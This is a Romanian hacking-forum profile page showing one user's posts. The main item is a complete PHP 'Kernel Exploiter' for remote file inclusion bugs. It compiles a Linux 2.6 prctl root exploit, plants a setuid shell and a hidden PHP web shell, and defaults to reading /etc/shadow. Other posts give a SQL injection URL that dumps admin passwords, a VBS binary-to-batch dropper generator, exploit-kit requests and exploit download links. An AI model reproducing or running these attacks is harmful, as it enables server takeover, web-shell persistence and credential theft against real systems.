alexcargo

Active Members
  • Content count

    122
  • Joined

  • Last visited

Community Reputation

10 Good

About alexcargo

  • Rank
    Registered user
  • Birthday
  1. NeoSploit este un tool care indentifica browseru si va lansa o serie de exploturi contra lui Zunker este un Complex Bot care are multe optiuni de atack si exploit screenshot aici http://blogs.pandasoftware.com/blogs/images/PandaLabs/2007/05/08/zunker2.png MPACK este o aplicatie php care se instaleaza pe un server web iar cand vizitatorul intra pe o pagina de obicei pe index.php va lansa o serie de exploituri contra lui
  2. are cineva vreunu din ele nu conteaza ce versiune? MPACK de la 0.60 la 0.80 daca e posibil MPACK costa 700 $ )
  3. http://analysis.seclab.tuwien.ac.at/
  4. daca incerci sa trimiti de pe computerul tau mesajele mai intai vezi sa nu ai portul inchis de la provider de obicei daca ai un forum pe un host(pe host platit merge 100 %) nustiu pe cele free dar cred ca merge poate gresesc eu merge sa le trimiti membrilor mesaje indiferent unde au ei contul de email dar cred ca tu ai instalat pe serveru tau local si vrei sa trimiti dar ai nevoie de ca portul sa fie deschis ca sa poti sa trimiti am avut si eu aceiasi problema si am reusit sa trimit emailuri prin serveru de dns cu programul asta Zmei Sender http://www.zmei-soft.com/sender/zsender.exe ATENTIE NU TRIMITE SPAM DE PE HOSTUL TAU ITI RISTI PIELEA SPER CA NU ASTA E INTENTIA TA
  5. nustiu daca e ceea ce iti trebuie tie dar incearca http://www.no-ip.com/
  6. dupa cum spune si titlu converteaza orice in .bat
  7. <?php /* Kernel Exploiter for use in RFI bugs. */ set_time_limit(0); if(isset($_POST['exploit_it'])) { if(stristr(php_uname(),"2.6.") && stristr(php_uname(),"Linux")) { if($_POST['compiler'] == "none") { echo '<div align="center"><h4>No compiler found! Can not continue.</h4></div>'; end; } $cc = $_POST['compiler']; $prctl = '#!/bin/sh cat > /tmp/getsuid.c << __EOF__ #include <stdio.h> #include <sys/time.h> #include <sys/resource.h> #include <unistd.h> #include <linux/prctl.h> #include <stdlib.h> #include <sys/types.h> #include <signal.h> char *payload="\nSHELL=/bin/sh\nPATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin\n* * * * * root chown root.root /tmp/s ; chmod 4777 /tmp/s ; rm -f /etc/cron.d/core\n"; int main() { int child; struct rlimit corelimit; corelimit.rlim_cur = RLIM_INFINITY; corelimit.rlim_max = RLIM_INFINITY; setrlimit(RLIMIT_CORE, &corelimit); if ( !( child = fork() )) { chdir("/etc/cron.d"); prctl(PR_SET_DUMPABLE, 2); sleep(200); exit(1); } kill(child, SIGSEGV); sleep(120); } __EOF__ cat > /tmp/s.c << __EOF__ #include<stdio.h> main(void) { setgid(0); setuid(0); if (getuid() == 0) { printf("\n[+] We have root!\n\n" ); system("/bin/sh"); system("$_POST[cmd]"); '; if(!stristr($_POST['shell'],"could not be found")) { $prctl .= 'system("cp /bin/ash '.$_POST['shell'].'");'; } $prctl .= 'system("rm -rf /tmp/s"); system("rm -rf /etc/cron.d/core*"); system("exit"); } else { printf("\n[-] Failed.\n\n" ); system("rm -rf '.$_ENV["TMPDIR"].'/s"); } return 0; } __EOF__ '; $phpwrapper = '<?php if(isset($_GET[cmd])) { echo "<pre>"; echo passthru("'.$_POST['shell'].' -c \"$_GET[cmd]\""); echo "</pre>"; } ?>'; echo "<pre><div align='center'>"; $h = fopen("/tmp/a.sh", "w"); fwrite($h,$prctl); fclose($h); $handle = fopen($_POST['php'], "w"); fwrite($handle, $phpwrapper); fclose($handle); echo "Building exploit.... "; echo passthru("sh /tmp/a.sh"); echo passthru("$cc -o /tmp/s /tmp/s.c"); echo passthru("$cc -o /tmp/getsuid /tmp/getsuid.c"); echo "Running exploit...waiting about 4 minutes to see if exploit worked "; echo passthru("/tmp/getsuid"); echo passthru("/tmp/s"); echo "Cleaning up "; echo passthru("rm -rf /tmp/getsuid*"); echo passthru("rm -rf /tmp/s.c"); echo passthru("rm -rf /tmp/a.sh"); echo "Done! </div> </pre>"; } else { echo "Kernel version IS NOT 2.6.x or is a version known to not work: ".php_uname(); } } else { ?> <div align="center"> <h4>PHP Attack Script</h4> <h5><?php echo php_uname(); ?></h5> <pre><div align="center"> Checking for temp Directory.........<?php echo $_ENV["TMPDIR"]."\n"; ?> Checking for cc or gcc............<?php $path = explode(":",$_ENV["PATH"]); $gotcc = FALSE; $gotgcc = FALSE; foreach($path as $dir) { if(is_file($dir."/cc") && $gotgcc == FALSE && $gotcc == FALSE) { $gotcc = TRUE; $pathtocc = $dir."/cc"; echo '[ <font color="#00CC00">OK</font> ]'."\n"; break; } elseif($gotcc == FALSE && $gotgcc == FALSE && is_file($dir."/gcc")) { $gotgcc = TRUE; $pathtogcc = $dir."/gcc"; echo '[ <font color="#00CC00">OK</font> ]'."\n"; break; } } if($gotcc == FALSE && $gotgcc == FALSE) { echo '[ <font color="#FF0000">Failed</font> ]'."\n"; } ?> Checking for execute permissions..<?php $h = fopen("/tmp/test.sh","w"); fwrite($h,"#!/bin/sh"); fclose($h); system("sh /tmp/test.sh",$returnval); if($returnval == 0) { echo '[ <font color="#00CC00">OK</font> ]'."\n"; } else { echo '[ <font color="#FF0000">Failed</font> ]'."\n"; } passthru("rm -rf /tmp/test.sh"); ?> </pre></div> <form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="post"> <table border="0" cellspacing="0"> <tr> <td><div align="right">Exploit:</div></td> <td> <select name="exploit"> <option selected="selected">Prctl 2.6.x exploit</option> </select> </td> </tr> <tr> <td><div align="right">Location and name for root shell:</div></td> <td><input type="text" name="shell" size="50" value="<?php if(file_exists("/bin/ash")) { echo getcwd()."/.ash"; } elseif(file_exists("/bin/zsh")) { echo getcwd()."/.zsh"; } else { echo "/bin/ash or /bin/zsh could not be found!"; } ?>"/></td> </tr> <tr> <td><div align="right">Location and name for php shell wrapper: </div></td> <td><input type="text" name="php" size="50" value="<?php echo getcwd()."/.shell.php" ?>" /></td> </tr> <tr> <td><div align="right">Commands to perform while root seperate multiple commands with ; : </div></td> <td><input type="text" name="cmd" size="50" value="cat /etc/shadow" /></td> </tr> </table> </div> <div align="center"> <input type="hidden" name="compiler" value="<?php if(isset($pathtocc)) { echo $pathtocc; } elseif(isset($pathtogcc)) { echo $pathtogcc; } else { echo 'none'; } ?>" /> <input type="hidden" name="exploit_it" value="doit" /> <input name="submit" type="submit" value="Submit" /> After pressing submit it may take up to 4 minutes for the page to load depending on exploit. This is due to the exploit being run. If exploit fails the system may be patched or kernel may not be vuln. </div> </form> <?php } ?>
  8. mersi ping dar eu am gasit chestia asta nu facuta de mine uni au facu phpshell asta si ia zis asa milw0rm nu e official dar in alte parti pe alte forumuri lumea imi sare in cap dar ei nu inteleg bine cuvantul sharing ma rog nu dau 2 bani pe ei.
  9. Are you aware of all the devices – USB sticks, CDs, floppies, smartphones, MP3 players, handhelds, iPods, digital cameras – that have been connected to your network? As an administrator, do you know how many employees have been using or are using portable storage devices at the moment? Monitoring your network for these devices is not only time-consuming but nearly impossible to do manually. http://www.endpointscan.com/
  10. http://www.mytempdir.com/1314256 misto imi place :wink: Enjoy
  11. http://www.mytempdir.com/1314235
  12. Google dork inurl:/blog/js.asp http://www.site.com/blog/js.asp?n=1&j=13&tid=1) and 1=2 union select username,password,3,4,5,6 from oblog_admin where id=(1
  13. Exploitu 1 http://www.mytempdir.com/1314191 Exploitu 2 http://www.mytempdir.com/1314292 Enjoy :wink:
  14. on error resume next set arg=wscript.arguments if arg.count=0 then wscript.quit with CreateObject("ADODB.Stream") .type=1:.open:.loadfromfile arg(0):bs=.read:l=.size:.close end with if err.number<>0 then wscript.quit set fso=CreateObject("Scripting.FileSystemObject") with fso.opentextfile(arg(0)&".bat",2,true) if err.number<>0 then wscript.quit .writeline "@echo bs=_>xx.vbs" for k=1 to l step 129 .write "@echo """ .write b64b(midb(bs,k,129)) .writeline """+_>>xx.vbs" next .writeline "@echo """":set rs=CreateObject(""ADODB.Recordset"")>>xx.vbs" .writeline "@echo set ado=CreateObject(""ADODB.Stream"")>>xx.vbs" .writeline "@echo l=len(bs):ss="""":for k=1 to l step 4096:ss=ss+ub64(mid(bs,k,4096)):next:l=len(ss)>>xx.vbs" .writeline "@echo rs.fields.append ""b"",205,l/2:rs.open:rs.addnew:rs(""b"")=ss+chrb(0):rs.update>>xx.vbs" .writeline "@echo ado.mode=3:ado.type=1:ado.open:ado.write rs(""b"").getchunk(l/2)>>xx.vbs" .writeline "@echo ado.savetofile """+fso.getfilename(arg(0))+""",2:ado.close>>xx.vbs" .writeline "@echo function ub64(s):dim t(4),b(3):ub64="""":n=len(s):r=2 >>xx.vbs" .writeline "@echo if n mod 4^<^>0 then exit function:end if:for i=1 to n step 4:for j=0 to 3 >>xx.vbs" .writeline "@echo a=asc(mid(s,i+j,1)):if a=43 then:a=62:else if a=47 then:a=63:else if a^>47 and a^<58 then:_>>xx.vbs" .writeline "@echo a=a+4:else if a=61 then:a=0:if r=2 then r=j-2:end if:else if a^>64 and a^<91 then:_>>xx.vbs" .writeline "@echo a=a-65:else if a^>96 and a^<123 then:a=a-71:else:exit function:_>>xx.vbs" .writeline "@echo end if:end if:end if:end if:end if:end if:t(j)=a:next>>xx.vbs" .writeline "@echo b(0)=t(0)+t(1)*64 mod 256:b(1)=t(1)\4+t(2)*16 mod 256:b(2)=t(2)\16+t(3)*4 >>xx.vbs" .writeline "@echo for j=0 to r:if b(j)^<16 then ub64=ub64+""0"":end if:ub64=ub64+hex(b(j))>>xx.vbs" .writeline "@echo next:next:end function>>xx.vbs&&cscript.exe //nologo xx.vbs&del xx.vbs" end with const b64 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/" function b64b(bin) b64b="" n=lenb(bin) for i=1 to n step 3 a=ascb(midb(bin,i,1)) b64b=b64b+mid(b64,a mod 64+1,1) if i b=ascb(midb(bin,i+1,1)) b64b=b64b+mid(b64,(a\64+b*4)mod 64+1,1) if i+1 c=ascb(midb(bin,i+2,1)) b64b=b64b+mid(b64,(b\16+c*16)mod 64+1,1) b64b=b64b+mid(b64,c\4+1,1) else b64b=b64b+mid(b64,b\16+1,1) b64b=b64b+"=" end if else b64b=b64b+mid(b64,a\64+1,1) b64b=b64b+"==" end if next end function copiatil intr-un fisier text si salvati ca Any2Bat.vbs sau cu ce nume doriti
  15. din pacate nu am acces la C: vine cam asa share-ul meu \\xxx.xxx.xxx.xxx\SharedDocs\aplicatie.exe da cum sa il execut la el ????